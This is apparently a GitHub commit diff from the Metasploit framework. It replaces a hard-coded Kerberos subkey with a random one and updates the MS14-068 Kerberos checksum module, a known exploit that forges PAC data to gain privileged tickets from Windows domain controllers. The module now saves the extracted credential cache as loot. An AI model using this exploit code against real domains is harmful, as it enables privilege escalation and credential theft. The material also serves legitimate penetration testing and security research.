Skip to content

Commit f37cf55

Browse files
jvazquez-r7jvazquez-r7
committed
Use random subkey
1 parent ad97457 commit f37cf55

File tree

2 files changed

+9
-7
lines changed

2 files changed

+9
-7
lines changed

lib/msf/kerberos/client/tgs_request.rb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -195,7 +195,7 @@ def build_authenticator(opts = {})
195195
# @see Rex::Proto::Kerberos::Model::EncryptionKey
196196
def build_subkey(opts={})
197197
subkey_type = opts[:subkey_type] || Rex::Proto::Kerberos::Crypto::RC4_HMAC
198-
subkey_value = opts[:subkey_value] || "AAAABBBBCCCCDDDD" #Rex::Text.rand_text(16)
198+
subkey_value = opts[:subkey_value] || Rex::Text.rand_text(16)
199199

200200
subkey = Rex::Proto::Kerberos::Model::EncryptionKey.new(
201201
type: subkey_type,

modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb

Lines changed: 8 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -8,6 +8,7 @@
88

99
class Metasploit4 < Msf::Auxiliary
1010

11+
include Msf::Auxiliary::Report
1112
include Msf::Kerberos::Client
1213

1314
def initialize(info = {})
@@ -51,7 +52,7 @@ def initialize(info = {})
5152

5253
def run
5354
print_status("#{peer} - Connecting with the KDC...")
54-
connect(:rhost => datastore['RHOST'])
55+
connect
5556

5657
unicode_password = Rex::Text.to_unicode(datastore['PASSWORD'])
5758
password_digest = OpenSSL::Digest.digest('MD4', unicode_password)
@@ -101,6 +102,7 @@ def run
101102
)
102103

103104
auth_data = build_pac_authorization_data(pac: pac)
105+
sub_key = build_subkey(subkey_type: Rex::Proto::Kerberos::Crypto::RC4_HMAC)
104106

105107
print_status("#{peer} - Sending TGS-REQ...")
106108

@@ -111,7 +113,8 @@ def run
111113
session_key: session_key,
112114
ticket: ticket,
113115
auth_data: auth_data,
114-
pa_data: pre_auth
116+
pa_data: pre_auth,
117+
subkey: sub_key
115118
)
116119

117120
unless res.msg_type == Rex::Proto::Kerberos::Model::TGS_REP
@@ -121,11 +124,10 @@ def run
121124

122125
print_good("#{peer} - Valid TGS-Response, extracting credentials...")
123126

124-
cache = extract_kerb_creds(res, 'AAAABBBBCCCCDDDD')
127+
cache = extract_kerb_creds(res, sub_key.value)
125128

126-
f = File.new('/tmp/cache.ticket', 'wb')
127-
f.write(cache.encode)
128-
f.close
129+
path = store_loot('windows.kerberos', 'application/octet-stream', rhost, cache.encode)
130+
print_good("#{peer} - MIT Credential Cache saved on #{path}")
129131
end
130132
end
131133

0 commit comments

Comments
 (0)